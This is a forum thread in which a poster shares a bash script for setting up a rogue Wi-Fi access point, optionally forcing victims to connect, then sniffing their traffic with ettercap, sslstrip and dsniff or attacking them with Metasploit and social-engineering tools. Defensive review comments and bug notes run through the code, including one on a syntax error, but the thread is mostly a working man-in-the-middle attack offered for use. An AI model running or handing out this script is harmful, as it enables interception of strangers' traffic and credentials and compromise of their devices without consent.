Complete PWN

Started by ghostdog, December 26, 2010, 12:56:18 PM


ghostdog

hi everyone
This is a complete pwn starting from :

1) setting up a fake AP
2) forcing the victim to connect
3) sniffing target
4) exploiting target with " Msf / Fasttrack"


Enjoy Hacking
GD



#!/bin/bash
# Rogue access-point helper as posted on the forum (2010-era BackBox layout:
# dhcp3, net-tools ifconfig/route, /pentest/* tool paths). It must run as root.
# Flow: dependency check -> reset host networking state -> interactive prompts
# -> put the wireless card in monitor mode with a chosen MAC -> start
# airbase-ng -> bring up at0 as 10.0.0.1/24 with NAT and a DHCP server ->
# launch third-party sniffing or exploitation tools in background xterms.
#
# Reviewer notes (defensive reading): every step below is a persistent,
# host-wide change — ip_forward is switched on, the entire iptables ruleset is
# flushed, /etc/dhcp3/dhcpd.conf is overwritten and the leases file emptied,
# /etc/etter.conf is edited in place. None of it is restored when the script
# exits, and all tool output goes to detached xterm windows.
echo "******************************************************************";
echo "*        WeLcOmE tO GhOsTdOg'S FaKe-Ap ScRiPt                    *";
echo "*       TeStEd WiTh BaCkBoX aNd rTl8187usb                       *";
echo "*        FeEl FrEe To EdIt ThIs FiLe As ToU wIsH                 *";
echo "* SeNd QuEsTiOnS, cOmMeNtS oR aDdItIoNs To GhOsTdOg67@GmAiL.CoM  *";
echo "******************************************************************";
echo "Checking if the correct programs are installed..........";
# NOTE(review): none of these checks stop the script. `{ echo ...; }` only
# prints, so execution continues even where the message says "Abort.".
# The three `locate` checks consult the updatedb index rather than the live
# filesystem, so they can be stale in either direction. airmon-ng, airbase-ng,
# aireplay-ng, macchanger, ifconfig and route are used later but never checked.
type -P dhcpd3 &>/dev/null || { echo "I require dhcpd3 but it's not installed.  Abort.";}
type -P aircrack-ng &>/dev/null || { echo "I require aircrack-ng but it's not installed.  Abort.";}
type -P xterm &>/dev/null || { echo "I require xterm but it's not installed.  Abort.";}
type -P iptables &>/dev/null || { echo "I require iptables but it's not installed.  Abort.";}
type -P ettercap &>/dev/null || { echo "I require ettercap for sniffing but it's not installed.";}
type -P sslstrip &>/dev/null || { echo "I require sslstrip for a sniffing tool but it's not installed.";}
type -P driftnet &>/dev/null || { echo "I require driftnet for a sniffing tool but it's not installed.";}
type -P urlsnarf &>/dev/null || { echo "I require urlsnarf for a sniffing tool but it's not installed.";}
type -P dsniff &>/dev/null || { echo "I require dsniff for a sniffing tool but it's not installed.";}
type -P python &>/dev/null || { echo "I require python for certain tools but it's not installed.";}
type -P msfconsole &>/dev/null || { echo "I require metasploit for an attack tool but it's not installed.";}
locate set_config &>/dev/null || { echo "I require Social Engineering Toolkit for an attack tool but it's not installed.";}
locate fast-track.py &>/dev/null || { echo "I require fast-track.py for an attack tool but it's not installed.";}
locate SimpleHTTPServer &>/dev/null || { echo "I require SimpleHTTPServer for an attack tool but it's not installed.";}
echo "******************************************************************";
echo "Activating IP Forwarding and killing old Rogue AP processes if they exist";
echo "******************************************************************";
echo "Note: I'm not killing certian tools as you may have them open and waiting before you run this script";
# Turns on IPv4 forwarding for the whole host; nothing in the script turns it
# back off. A host-hardening baseline that pins ip_forward=0 would flag this.
echo 1 > /proc/sys/net/ipv4/ip_forward;
# SIGKILLs every process with one of these names system-wide — including any
# xterm or tail the user has open that has nothing to do with this script.
killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null ;
sleep 1;
# Flushes and deletes every chain in the filter and nat tables: whatever host
# firewall was in place is gone from this point on, and the policies set later
# (FORWARD ACCEPT, MASQUERADE) are built on the empty tables.
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
sleep 1;
echo "******************************************************************";
# Interface listing relies on the old net-tools ifconfig format, which labels
# the hardware address "HWaddr"; newer net-tools prints "ether" instead, so
# this may print nothing on a current system.
ifconfig | grep -A 1 HWaddr;
echo "******************************************************************";
# Interactive prompts. NOTE(review): every value read below is used verbatim —
# passed to ifconfig, macchanger, airbase-ng, iptables and written into
# dhcpd.conf — with no validation, and `read` is used without -r. In each
# "Using ..." echo the double quotes close before the variable, so the value
# itself is unquoted and subject to word splitting; harmless for an interface
# name, but the same pattern is repeated for every input.
echo "Enter the interface connected to the internet (eth0, wlan0)";
read IFACE;
echo "Using "$IFACE" to connect to the internet";
echo "******************************************************************";
echo "Enter the Interface used to create the Rogue AP (wlan0, wlan1)";
read WIFACE;
echo "Using "$WIFACE" to create the Rouge AP";
echo "******************************************************************";
echo "Enter the Interface used to monitor (mon0)";
read MIFACE;
echo "Using "$MIFACE" to monitor";
echo "******************************************************************";
echo "Your Gateway should be below"
# Prints the second column (Gateway) of `route -n`, dropping lines that contain
# 0.0.0.0 or "IP" (the "Kernel IP routing table" title). The column header
# word "Gateway" is not filtered and will appear in the output as well.
route -n | awk '{ print $2 }' | grep -v 0.0.0.0 | grep -v IP;
echo "******************************************************************";
echo "Enter your "$IFACE" Gateway IP";
read GW;
echo "Using "$GW" for the Gateway address";
echo "******************************************************************";
echo "Your "$IFACE" IP should be below"
ifconfig | grep -A 1 "$IFACE";
echo "******************************************************************";
echo "Enter your "$IFACE" IP address";
read IFACEIP;
echo "Using "$IFACEIP" as your IP address";
echo "******************************************************************";
# AP name, channel and MAC go straight to airbase-ng / macchanger below.
echo "Enter the name of your Rogue AP";
read AP;
echo "using "$AP" for Rogue AP name";
echo "******************************************************************";
echo "Enter the channel number for your Rogue AP (1,2,3,4,5,6,7,8,9)";
read CH;
echo "using "$CH" for Rogue AP channel";
echo "******************************************************************";
echo "Enter the MAC for your Rogue AP, Ex: 0A:1B:2C:3D:4E:5F";
read MAC;
echo "using "$MAC" for Rogue AP MAC address";
echo "******************************************************************";
# MTU is applied to at0 later; the script itself offers no guidance beyond
# "try a different setting".
echo "Select your MTU setting (1400, 1500 or maybe 1800??)";
read MTU;
echo "Using "$MTU", If you have problems try a different setting";
echo "******************************************************************";
echo "Restarting "$WIFACE" and changing mac address to "$MAC" on "$MIFACE"";
# Monitor-mode setup. The monitor interface name is whatever the user typed
# at the "(mon0)" prompt; the name airmon-ng actually creates is never read
# back, so a mismatch shows up only as failures in the commands below.
airmon-ng stop "$MIFACE";
airmon-ng stop "$WIFACE";
ifconfig "$WIFACE" down;
airmon-ng start "$WIFACE";
sleep 2;
ifconfig "$MIFACE" down;
sleep 1;
# Sets the user-supplied MAC on the monitor interface. From a defender's
# point of view this is the BSSID the rogue AP will beacon with, and
# macchanger leaves the original address recorded in its own output only.
macchanger -m "$MAC" "$MIFACE";
sleep 1;
ifconfig "$MIFACE" up;
sleep 1;
# Loads the tun module — presumably for the at0 tap interface that is
# configured further down; the script does not check whether it loaded.
modprobe tun;
sleep 1;
echo "Testing "$MIFACE" for injection";
# Injection test runs in a held xterm; the result is never checked, the
# script just sleeps five seconds and carries on. The &>/dev/null applies to
# xterm's own stdout/stderr, not to the program shown inside the window.
xterm -hold -bg black -fg blue -e aireplay-ng --test "$MIFACE" &>/dev/null &
sleep 5;
echo "******************************************************************";
echo "Do you want to 'let' users connect, or 'force' users to connect to "$AP"? let or force";
read CON;
# Starts airbase-ng in one of two modes. Accepted answers are 'let' and
# 'force'; the error branch says "'let' or 'make'", which does not match, and
# exits with status 0 even though it is the failure path. In neither branch
# is the exit status of xterm/airbase-ng checked — the later "should be
# running now!" message is unconditional.
if [ "$CON" == "let" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP....";  
  # Plain open AP with the user's ESSID on the user's channel.
  xterm -hold -bg black -fg blue -e airbase-ng -e "$AP" -c "$CH" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Letting the clients connect to "$AP"";
elif [ "$CON" == "force" ];then
  echo "******************************************************************";
  echo "Building your "$AP" Rogue AP....";
  # The "force" variant adds -P -C 30 and does not pass -c "$CH", so the
  # channel entered earlier is unused here. The script's own description of
  # this mode is "forcing clients to connect"; a wireless IDS that alerts on
  # an AP answering probes for many ESSIDs is the usual way this is spotted.
  xterm -hold -bg black -fg blue -e airbase-ng -P -C 30 -e "$AP" -v "$MIFACE" &>/dev/null &
  echo "******************************************************************";
  echo "Forcing clients to connect to "$AP"";
else
  echo "******************************************************************";
  echo "Enter 'let' or 'make' only!!!";
  exit 0
fi
sleep 3;
echo "******************************************************************";
echo "Waiting a few seconds for "$AP" to be established";
sleep 3;
# at0 is the tap interface created by airbase-ng; the client subnet is
# hard-coded to 10.0.0.0/24 with this host as 10.0.0.1. Clients that land on
# a 10.0.0.x address with a 10.0.0.1 gateway is one observable fingerprint of
# this script.
ifconfig at0 up;
ifconfig at0 mtu "$MTU";
ifconfig at0 10.0.0.1 netmask 255.255.255.0;
# Explicit route for the connected subnet via at0's own address (the kernel
# normally installs the connected route when the address is assigned, so
# this is presumably belt-and-braces).
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1;
echo "******************************************************************";
echo ""$AP" should be running now!";
echo "******************************************************************";
echo "Setting up the iptables";
# Forwarding is opened unconditionally and client traffic is masqueraded out
# of the upstream interface, so from the upstream network every client
# appears to come from this host's address.
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface "$IFACE" -j MASQUERADE ;
iptables --append FORWARD --in-interface at0 -j ACCEPT ;
echo "******************************************************************";
echo "Setting up the DHCP server and running it";
echo "******************************************************************";
# Overwrites the system dhcpd.conf (the first `>` truncates it, no backup).
# Leases 10.0.0.10-20, router 10.0.0.1, and DNS pointed at the upstream
# gateway entered earlier — the same quoting pattern as the prompts, so $GW
# is unquoted inside the line.
echo "ddns-update-style none;" > /etc/dhcp3/dhcpd.conf
echo "authoritative;" >> /etc/dhcp3/dhcpd.conf
echo "default-lease-time 600;" >> /etc/dhcp3/dhcpd.conf
echo "max-lease-time 7200;" >> /etc/dhcp3/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf
echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
echo "option subnet-mask 255.255.255.0;" >> /etc/dhcp3/dhcpd.conf
echo "option broadcast-address 10.0.0.255;" >> /etc/dhcp3/dhcpd.conf
echo "option domain-name-servers "$GW";" >> /etc/dhcp3/dhcpd.conf
echo "range 10.0.0.10 10.0.0.20;" >> /etc/dhcp3/dhcpd.conf
echo "}" >> /etc/dhcp3/dhcpd.conf
# Assumes a dhcpd user/group exists; the chown failure is not handled.
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd ;
# Empties the existing leases database.
echo > '/var/lib/dhcp3/dhcpd.leases';
# dhcpd3 in foreground/debug mode inside a held xterm, bound to at0 only.
xterm -hold -bg black -fg blue -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
sleep 2;
echo "Launching DHCP entries log";
# Lease activity is read from syslog; the same file is where a host-side
# reviewer would find the record of which clients associated.
xterm -bg black -fg blue -e tail -f /var/log/messages &>/dev/null &
echo "******************************************************************";
echo "Do you want to 'sniff' or 'attack' "$AP"? sniff or attack";
read DO;
# Mode selection. NOTE(review): the `fi` near the end of this compound
# command closes this `if`, so the `else` that follows it has no matching
# `if` — bash reports a syntax error when it reaches that line, and the
# "Enter 'sniff' or 'attack' only!!!" message is never printed.
if [ "$DO" == "sniff" ];then
  echo "******************************************************************";
  echo "Launching ettercap...";
  echo "******************************************************************";
  # Edits /etc/etter.conf in place (sed -i, no backup) to uncomment the
  # iptables redirect commands if the stock commented line is present. This
  # is a permanent change to a system config file; `cat | grep` could be
  # `grep -q ... /etc/etter.conf`.
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
     sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf
     sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf
     echo "Uncommented your iptables in /etc/etter.conf for you Smiley";
  fi
  # No -i and no --dport: every UDP packet entering this host on any
  # interface, not just DNS from at0, is rewritten to the gateway address.
  iptables -t nat -A PREROUTING -p udp -j DNAT --to "$GW" ;
  sleep 1;
  # ettercap text mode on at0, logging to a timestamped file in the current
  # directory; run via sudo inside the xterm even though the script already
  # needs root for everything above.
  xterm -hold -bg black -fg blue -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &>/dev/null &
  #sudo ettercap -G &>/dev/null &
  sleep 7;
  echo "******************************************************************";
  echo "If ettercap is now sniffing then startup some other fun tools";
  echo "******************************************************************";
  # Menu printer for the sniff branch (a second showMenu with different
  # items is defined in the attack branch; only one branch ever runs).
  showMenu () {
  echo
  echo "1) sslstrip"
  echo "2) driftnet"
  echo "3) urlsnarf"
  echo "4) dsniff"
  echo "5) Add your own tool"
  echo "6) Exit"
  echo
}
# Loops until option 6. Each option only starts another background xterm;
# nothing is tracked or stopped, and option 6 exits the script with
# everything (xterms, iptables rules, dhcpd) still running. Unknown input
# falls through the case silently.
while [ 1 ]
do
  showMenu
  read CHOICE
  case "$CHOICE" in
  "1")
     echo "Setting up sslstrip";
     # REDIRECT has no -i, so TCP/80 on every interface goes to 8080.
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 ;
     xterm -bg black -fg blue -e sslstrip -a -k -f -l 8080 &>/dev/null &
     sleep 1;
     # NOTE(review): sslstrip above is given no log-file name, so the
     # timestamped file tailed here is assumed, not created by that command
     # — verify against sslstrip's default log location.
     xterm -bg black -fg blue -e tail -f sslstrip$(date +%F-%H%M).log &>/dev/null &
     ;;
  "2")
     echo "Setting up driftnet";
     xterm -bg black -fg blue -e driftnet -v -i at0 &>/dev/null &  
     ;;
  "3")
     echo "Setting up urlsnarf";
     xterm -bg black -fg blue -e urlsnarf -i at0 &>/dev/null &  
     ;;
  "4")
     echo "Setting up dsniff";
     # dsniff writes its own timestamped log in the current directory.
     xterm -bg black -fg blue -e dsniff -m -i at0 -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null &    
     ;;
  "5")
     echo "******************************************************************";
     echo "What other sniffing tools are you planning to use? Email me ghostdog67@gmail.com";
     # Just opens an empty shell window.
     xterm -bg black -fg blue &>/dev/null &
     echo "******************************************************************";
     ;;
  "6")
     echo "******************************************************************";
     echo "*******ThAnK yOu FoR uSiNg gHoStDoG's FaKe-Ap ScRiPt!*************";
     echo "******************************************************************";
     exit 0
     ;;
  esac
done
elif [ "$DO" == "attack" ];then
  echo "******************************************************************";
  echo "You have choosen to attack, Select some tools to start attacking, better hurry time is of the essence";
  echo "******************************************************************";
# Menu printer for the attack branch (redefines showMenu; see sniff branch).
showMenu () {
  echo
  echo "1) SimpleHTTPServer port 80"
  echo "2) Social Engineering Toolkit"
  echo "3) Metasploit"
  echo "4) Fast-Track"
  echo "5) Add your own tool"
  echo "6) Exit"
  echo
}
# Same loop shape as the sniff menu. Every tool option ends by appending the
# same DNAT rule (at0 TCP/80 -> this host's upstream address), so choosing
# several options, or the same one twice, stacks duplicate rules. Each option
# waits a fixed number of seconds instead of checking that the tool started.
while [ 1 ]
do
  showMenu
  read CHOICE
  case "$CHOICE" in
  "1")
     # Serves the script's current working directory; `-m SimpleHTTPServer`
     # exists only in Python 2 (the `python` checked at the top).
     echo "Setting up SimpleHTTPServer on port 80 in "$PWD"";
     xterm -bg black -fg blue -e python -m SimpleHTTPServer 80 &>/dev/null &
     sleep 3;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"
     ;;
  "2")
     echo "Setting up Social Engineering Toolkit";
     # `cd ... && xterm ... &` backgrounds the whole and-list in a subshell,
     # so the cd does not change this script's working directory (or $PWD
     # as printed in option 1). Tool paths are hard-coded BackTrack-style
     # /pentest locations.
     cd /pentest/exploits/SET && xterm -bg black -fg blue -e ./set &>/dev/null &
     sleep 10;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"
     ;;
  "3")
     echo "Setting up Metasploit.........";
     cd /pentest/exploits/framework3 && xterm -bg black -fg blue -e ./msfconsole &>/dev/null &
     sleep 2;
     echo "Few more seconds......";
     sleep 15;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"
     ;;
  "4")
     echo "Setting up Fast-Track";
     cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -e ./fast-track.py -i &>/dev/null &
     sleep 10;
     iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP"  
     ;;
  "5")
     echo "******************************************************************";
     echo "What other attacks are you planning? Email me ghostdog67@gmail.com";
     xterm -bg black -fg blue &>/dev/null &
     echo "******************************************************************";
     ;;
  "6")
     echo "******************************************************************";
     echo "*******ThAnK yOu FoR cHoOsInG gHoStDoG's FaKe-Ap ScRiPt!**********";
     echo "******************************************************************";
     exit 0
     ;;
  esac
done
  # This `fi` terminates the sniff/attack `if` above.
  fi
# Unmatched: there is no open `if` for this `else` to belong to (see the note
# at the top of this block).
else
  echo "******************************************************************";
  echo "Enter 'sniff' or 'attack' only!!!";
  exit 0
fi

raffaele

#1
Very good ;)
raffaele@backbox:~$ Get root or die tryin'